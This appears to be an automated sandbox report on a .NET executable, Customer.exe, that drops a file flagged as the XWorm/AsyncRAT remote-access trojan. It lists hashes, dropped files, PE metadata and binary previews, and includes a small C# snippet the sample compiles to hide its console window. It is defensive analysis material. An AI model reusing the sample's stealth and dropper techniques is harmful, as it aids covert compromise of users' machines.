                                                                                                    https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4
                                                                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                                                                    • 185.199.111.133
                                                                                                    • 140.82.121.4

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Customer.exe.log

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4757
                                                                                                    Entropy (8bit):5.363658266795526
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:iqbYqGSI6ogwmj0q0ajtIzQ0cxYsAmSvBjwQYrKxmDRtzHeqKkCq10tpDuqDqWi/:iqbYqGcLwmj0qjIzQ0JyZtzHeqKkCq1B
                                                                                                    MD5:73CA263A853CB35DB929B19BC593A5C4
                                                                                                    SHA1:01F272ED7D5A6AFEB3376C700F1887E686FE5127
                                                                                                    SHA-256:969C451B86A8874F3549CEB55D6A07D6C6C86A861AA027567B3EEF86E4483CCC
                                                                                                    SHA-512:29BF55FF62CFDB46899DC1C053122DDC3A17E13F5174420B5C39B71121FD0EA8247DC4C180317838ABD7817D3E896D238875CA1803F23519E5C39E8F6E56F7B6
                                                                                                    Malicious:true
                                                                                                    Reputation:low
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\27947b366dfb4feddb2be787d72ca90d\System.Management.Automation.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages

                                                                                                    C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.0.cs

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):296
                                                                                                    Entropy (8bit):4.986871746339591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:V/DsYLDS81zu+VMUL+fFSRaioveJwsfFSRkoSoODxLNKy:V/DTLDfugM/EyWwIE9OxJKy
                                                                                                    MD5:192212FD8703F800C49BA96F01932522
                                                                                                    SHA1:F24764777B0A1C4B963E6035B9B5846A314192F7
                                                                                                    SHA-256:319AF060598B22FCEA608F61EF06539A09578B4AA8CAF3DFD1F5619A3D9F33CC
                                                                                                    SHA-512:C0F853C23741A58E388E0744C1DF8DF2BE4D72719528C7BEE61D52744CD0ED11C2C25BA4BF8E7438305E7B19BC0EF6C094D84BAD8060955EC3CF21212244D5A9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace Console.{. public class Window. {. ..[DllImport("Kernel32.dll")]..public static extern IntPtr GetConsoleWindow();..[DllImport("user32.dll")]..public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);.... }..}.

                                                                                                    C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):369
                                                                                                    Entropy (8bit):5.182039243270917
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fnWzxs7+AEszIwkn23fnxx:p37Lvkmb6KRfOWZEif5x
                                                                                                    MD5:2B8E9847767379EFFF9A6A0CCF16BBCF
                                                                                                    SHA1:765E7C2687AC9A00DA8928EC80542F6D216B37F7
                                                                                                    SHA-256:96A035FD2A10E4BEB7E1EB6E854B557054C1417564C5EB9A4644248CA7D609D4
                                                                                                    SHA-512:4E294976038F46B01E34FDE42DE4659BAB33D6F6AF350F19EB4E160354986FF79DB0B5A66B86A79CF82967531826626E5018856C817EC2CA63FB040353136F94
                                                                                                    Malicious:true
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.0.cs"

                                                                                                    C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.dll

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):2.8246372111305353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:etGSuWpeYYqql78G7v/9ZetkZfp9PRFWI+ycuZhN0QakSvVPNnq:6u1YSlIqvFZRJp9PK1ul0Qa3vPq
                                                                                                    MD5:E82AD88C70981069060E1C693B98F8CB
                                                                                                    SHA1:7535DF9FDB201A8077E59400DF5E0F91CAA202E0
                                                                                                    SHA-256:8522042F34DDCD53B27DDF552677C91188A8EB3ABFC8C7B4FD2F8C95005E8172
                                                                                                    SHA-512:30BDEFD3409FBF187EB736507CB7C78EA3ED5B40A793C9903064D311CB74FA2FC83B681936C8ED7AABB5FC48ECF85E65AAC795842E2D3693ED494D0CA7A0083C
                                                                                                    Malicious:true
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c}g...........!.................#... ...@....... ....................................@.................................d#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....m.....m.......................................... =............ N.....P ......Y........._.....d...Y.....Y...!.Y.....Y.......".....+.........=.......N.......................................&........<Module

                                                                                                    C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.out

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (448), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):869
                                                                                                    Entropy (8bit):5.289884766028802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:KJBId3ka6KRfPEif5UKax5DqBVKVrdFAMBJTH:Ckka6CPEu5UK2DcVKdBJj
                                                                                                    MD5:62DE7305F63AA6FEFF977455B94957BE
                                                                                                    SHA1:3B07CDFDC535054FE73CDEBF25E750EFEDB1C314
                                                                                                    SHA-256:6EDE422B9196041D69B77D3C0228AEBF4783413D57502C3E29550E88931CD3ED
                                                                                                    SHA-512:B70BA9DD83374F24A169D180D95A3CB84679F77A0C8A21E5385559A62C5DB09B124C1AEE6C23798F9A4D6E8096C166A2F043BDEFF4C5E31FA239DF5911E59BF7
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                    C:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:MSVC .res
                                                                                                    Category:dropped
                                                                                                    Size (bytes):652
                                                                                                    Entropy (8bit):3.0736638478670595
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyQak7YnqqvVPN5Dlq5J:+RI+ycuZhN0QakSvVPNnqX
                                                                                                    MD5:C2AE2F19C1756733FA9AEDDB0923C38E
                                                                                                    SHA1:B2453A119E52EB01F6CCC4C47E9BA5135B837AE7
                                                                                                    SHA-256:391C0F8A9175417B247111EDB3115519B3B023CB1113E2B72529999B97060CA7
                                                                                                    SHA-512:1006E4BCEB0D6ADA055D996606EC31B4979DE5AE5D4E1D5A2F1DD3B6BB665B49849E11DCA04B3ED4A06C6A1C3F26569DC716D39AFB543601BF29348003255918
                                                                                                    Malicious:false
                                                                                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.o.g.m.n.i.t.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.o.g.m.n.i.t.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                    C:\Users\user\AppData\Local\Temp\RES6040.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Tue Jan 7 17:25:52 2025, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1332
                                                                                                    Entropy (8bit):3.978579909326104
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:HqEFzW9nZfEMrDfHXwKEsmNwI+ycuZhN0QakSvVPNnqS2d:iBL3AKhmm1ul0Qa3vPqSG
                                                                                                    MD5:95D613F2DE7B43683E2CF182C098D0F6
                                                                                                    SHA1:0E9B4A4BB4172626ED76960EE02F2F3A562E7727
                                                                                                    SHA-256:0D602F4DE28E4A8FE9CF6F6E6EFD6167C1121E2A9E5866A7367801A39AD5B93E
                                                                                                    SHA-512:1AE7DD5A950B00D217B22EA6750A9C865CC78CD4BEAEF500415A46F87A84F0097412B9DE95611D84A23D04CABA2CC4E450C5580A9915194A8EB050FD5EEB3569
                                                                                                    Malicious:false
                                                                                                    Preview:L....c}g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP................./..ug3.....#...........4.......C:\Users\user\AppData\Local\Temp\RES6040.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.o.g.m.n.i.t.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                                                                    C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):33792
                                                                                                    Entropy (8bit):5.56352885851398
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:REi/Uua+vNijn/xVnzc6nLj7x3ZFsLcvSAOoaTRApkFTBLTsOZwpGN2v99Ikuisy:3a+vNkDpXx3HJvluTVF89jIOjhvb3
                                                                                                    MD5:F2CE039294AD313D2A9A84855C27341D
                                                                                                    SHA1:BBB87057A6B476AC988766DD14DC73B7A802B472
                                                                                                    SHA-256:E328AF9DECF08BCAAB7ADA74100CC56186383A3BF51C9DE6A9D7B41EA3AEA094
                                                                                                    SHA-512:7AA9A1A8384F1A3E68A1B6D2FE16F092F6176464FF4668C48C68CF56F2D8B31B453530747A0012ADFA7CAEA96EDCFA4ADF4B385E7611462429F9617715D2DC8F
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Joe Security
                                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Sekoia.io
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 91%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Tfg.................z.............. ........@.. ....................................@.................................t...W.................................................................................... ............... ..H............text....x... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......HP..,H............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4wnvz4o.fdk.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwxcddqn.sw5.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qeprird0.zzi.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zf0xtjjd.ntl.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\Customer.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    Static File Info

                                                                                                    General

                                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Entropy (8bit):5.758621025274117
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
                                                                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                    • Windows Screen Saver (13104/52) 0.07%
                                                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                                    File name:Customer.exe
                                                                                                    File size:36'352 bytes
                                                                                                    MD5:e22d80df02163d375fa6a7b08700eb01
                                                                                                    SHA1:05fbdaaad1ffbee891739f8a0df2cae8059d4011
                                                                                                    SHA256:0dae41b10dc8aac507b9634de862384ee712c230f3ed1fed2075e5884ad75972
                                                                                                    SHA512:cc5bc4263e0799ad0304a43e932de2539c9d8fbb284afd3d8faa6290b292eff093228852e47f8048fd08a415d5c44a9a6174bb492135ee12890aaac09dc9409d
                                                                                                    SSDEEP:768:UCB/mZMXnTgjjSxKSPSsOOnNSnBvHsktOXbOfq1ckMrblk:UIxTghG90VMktCbO4MrZk
                                                                                                    TLSH:C7F24C05679CC22FE7AF0ABD386216210231E6952E13DBE61DCD68FEECA774046167C7
                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....qqg............................>.... ........@.. ....................................@................................

                                                                                                    File Icon

                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                    Static PE Info

                                                                                                    General

                                                                                                    Entrypoint:0x40a33e
                                                                                                    Entrypoint Section:.text
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x677171DD [Sun Dec 29 15:59:25 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:4
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:4
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:4
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xa2e80x53.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x488.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000x83440x8400ce0bda83df3b744cd3e401052b7e4be7False0.46937144886363635data5.912078840807014IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xc0000x4880x600d1eaf47055918310a1eff66da093829eFalse0.3522135416666667data3.431740121852299IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0xe0000xc0x2006a53d5a6db2b0b1ad6f3e697005c789cFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                    RT_VERSION0xc0a00x24cdata0.46598639455782315
                                                                                                    RT_MANIFEST0xc2f00x193XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5732009925558312

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Network Behavior

                                                                                                    Suricata IDS Alerts

